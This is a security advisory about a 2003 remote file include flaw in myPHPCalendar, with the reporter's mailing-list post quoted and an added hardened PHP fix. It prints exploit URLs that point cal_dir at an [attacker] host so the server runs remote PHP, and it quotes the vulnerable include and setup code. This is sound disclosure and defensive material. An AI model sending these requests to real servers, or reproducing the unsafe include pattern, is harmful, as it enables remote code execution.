SecurityTracker.com
Category:  Application (Calendar)  >  myPHPCalendar
Vendors:  myphpcalendar.sourceforge.net
myPHPCalendar Include File Flaw Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1007919
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Oct 12 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 10192000 Build 1 Beta
Description:  An include file vulnerability was reported in myPHPCalendar. A remote user can execute arbitrary PHP code, including operating system commands, on the target system.

Frog-m@n reported that the 'admin.php', 'contacts.php', and 'convert-date.php' files include some files relative to the $cal_dir directory. A remote user can specify a remote location for the $cal_dir directory to cause files at the remote location to be included and executed by the target server.

Some demonstration exploit URLs are provided:

http://[target]/admin.php?cal_dir=http://[attacker]/
http://[target]/contacts.php?cal_dir=http://[attacker]/
http://[target]/convert-date.php?cal_dir=http://[attacker]/

The above URLs will cause the target server to include either of the following files:

http://[attacker]/vars.inc
http://[attacker]/prefs.inc

Impact:  A remote user can cause arbitrary PHP code, including operating system commands, to be executed by the target system. The commands will run with the privileges of the web server.
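As an added example (not myPHPCalendar's own code, nor the phpsecure.info patch), this is a hardened replacement for the globals.inc pattern quoted in the source message below, where $cal_dir arrives through register_globals and is used directly as an include path. The base directory name CAL_BASE_DIR and the helper resolve_cal_dir() are assumptions; the simplest fix is to never read $cal_dir from the request at all, and the helper covers the case where a configurable subdirectory is still wanted.

```php
<?php
// Hardened globals.inc (added example). The original relies on register_globals
// to populate $cal_dir, so a request parameter chooses what gets included.
// Here the base directory is fixed by the application, and a request-supplied
// value is accepted only if it names an existing subdirectory of that base.

define('CAL_BASE_DIR', __DIR__ . '/');   // assumed: app root holds vars.inc and prefs.inc

/**
 * Resolve the calendar directory safely.
 * Returns the absolute path (with trailing slash), or false if the candidate
 * is not a real directory under CAL_BASE_DIR.
 */
function resolve_cal_dir($candidate)
{
    // Default to the application's own directory, never to a request value.
    if ($candidate === null || $candidate === '') {
        return CAL_BASE_DIR;
    }
    // Reject anything with a scheme prefix (http://, ftp://, php://, data:, ...),
    // which is exactly how the remote include in this advisory is triggered.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $candidate)) {
        return false;
    }
    // Accept only a single path component made of safe characters
    // (no slashes, no "..", no NUL bytes).
    if (!preg_match('#^[A-Za-z0-9_-]+$#', $candidate)) {
        return false;
    }
    // realpath() collapses symlinks; the result must still be inside the base.
    $real = realpath(CAL_BASE_DIR . $candidate);
    $base = realpath(CAL_BASE_DIR) . '/';
    if ($real === false || !is_dir($real) || strpos($real . '/', $base) !== 0) {
        return false;
    }
    return $real . '/';
}

// Read the parameter explicitly instead of relying on register_globals.
$cal_dir = resolve_cal_dir(isset($_GET['cal_dir']) ? $_GET['cal_dir'] : null);
if ($cal_dir === false) {
    http_response_code(400);
    exit('invalid cal_dir');
}

// Same include lines as the original globals.inc, now on a validated local path.
include($cal_dir . "vars.inc");
include($cal_dir . "prefs.inc");
```

Turning off register_globals and, where remote includes are not needed, allow_url_fopen in php.ini removes the same exposure at the configuration layer, independently of the code fix.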
Solution:  No vendor solution was available at the time of this entry.

An unofficial patch is available at:

http://www.phpsecure.info/

Vendor URL:  myphpcalendar.sourceforge.net/
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Frog Man" <leseulfrog@hotmail.com>
Message History:   None.


 Source Message Contents

Date:  Sun, 12 Oct 2003 13:18:44 +0200
From:  "Frog Man" <leseulfrog@hotmail.com>
Subject:  [VulnWatch] myPHPCalendar : Information Disclosure, File Include

 

Information :
°°°°°°°°°°°°°
Language : PHP
Version : 10192000 Build 1 Beta
Website : http://myphpcalendar.sourceforge.net/
Problems :
- Information Disclosure
- File Include


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

admin.php, contacts.php, convert-date.php :

------------------------
include ("globals.inc");
------------------------

globals.inc :

------------------------------
include($cal_dir."vars.inc");
include($cal_dir."prefs.inc");
------------------------------


index.php :

----------------------------------------
include ($cal_dir."globals.inc");
[...]
include($cal_dir."sql.inc");
----------------------------------------


setup.php :

----------------------------------------------------------------
$fp = fopen("setup.inc", "w+");
fputs($fp, "<?php\n");
fputs($fp, "\$url = \"".$URL."\";\n");
fputs($fp, "\$mainscript = \"".$MAINSCRIPT."\";\n");
fputs($fp, "\$mysql_server = \"".$MYSQL_SERVER."\";\n");
fputs($fp, "\$mysql_username = \"".$MYSQL_USERNAME."\";\n");
fputs($fp, "\$mysql_pass = \"".$MYSQL_PASS."\";\n");
fputs($fp, "\$database_name = \"".$DATABASE_NAME."\";\n");
fputs($fp, "\$db_type = \"".$DB_TYPE."\";\n");
fputs($fp, "\$user_text = \"".$USER_TEXT."\";\n");
fputs($fp, "\$crypt_type = \"".$CRYPT_TYPE."\";\n");
fputs($fp, "\$display_username = \"".$DISPLAY_USERNAME."\";\n");
fputs($fp, "\$maxdisplay = \"".$MAXDISPLAY."\";\n");
fputs($fp, "\$admin_email = \"".$ADMIN_EMAIL."\";\n");
----------------------------------------------------------------


Exploits :
°°°°°°°°

http://[target]/admin.php?cal_dir=http://[attacker]/
http://[target]/contacts.php?cal_dir=http://[attacker]/
http://[target]/convert-date.php?cal_dir=http://[attacker]/

will include the files :

http://[attacker]/vars.inc and/or http://[attacker]/prefs.inc

and http://[target]/index.php?cal_dir=http://[attacker]/ will include the files :

http://[target]/globals.inc
http://[target]/sql.inc



Patch :
°°°°°°°
A patch and more details can be found on http://www.phpsecure.info.




frog-m@n


Copyright 2002, SecurityGlobal.net LLC